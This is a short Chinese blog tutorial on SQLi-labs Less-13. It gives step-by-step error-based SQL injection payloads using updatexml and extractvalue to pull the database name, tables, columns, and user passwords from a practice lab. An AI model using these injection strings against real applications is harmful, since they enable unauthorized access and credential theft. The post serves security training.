sql_lab之sqli中的报错注入,less13

2023-12-21 09:27:15

报错注入(less-13)

正常报错注入:

1.输入用户名和密码123 123显示登录错误

2.输入用户名和密码123’?123显示登录错误

123后面有’)说明是’)注入

3.查询数据库名

1')?and updatexml('<a><b></b></a>',concat('1111',database(),'1'),'1')?-- s

爆出XPATH syntax error: 'security1'

或者用1') and extractvalue('1',concat('1',database())) -- s

爆出XPATH syntax error: 'security'

4.查询表名

1') and extractvalue('1',concat('1',(select group_concat(table_name) from information_schema.tables where table_schema='SECURITY'))) -- s

5.查询users用户的字段名

1') and extractvalue('1',concat('1',(select group_concat(column_name) from information_schema.columns where table_schema='SECURITY' and table_name='users'))) -- s

6.查询username和password

输入这个

1') and extractvalue('1',concat('1',(select group_concat(username) from users))) -- s

Username结果显示

同理

1') and extractvalue('1',concat('1',(select group_concat(password) from users))) -- s

Password结果显示

注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现错误

比如:

=1') and extractvalue('1',concat('1',(select group_concat(username),group_concat(password) from users))) -- s

结果为:

文章来源:https://blog.csdn.net/qq_59020256/article/details/135121878
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。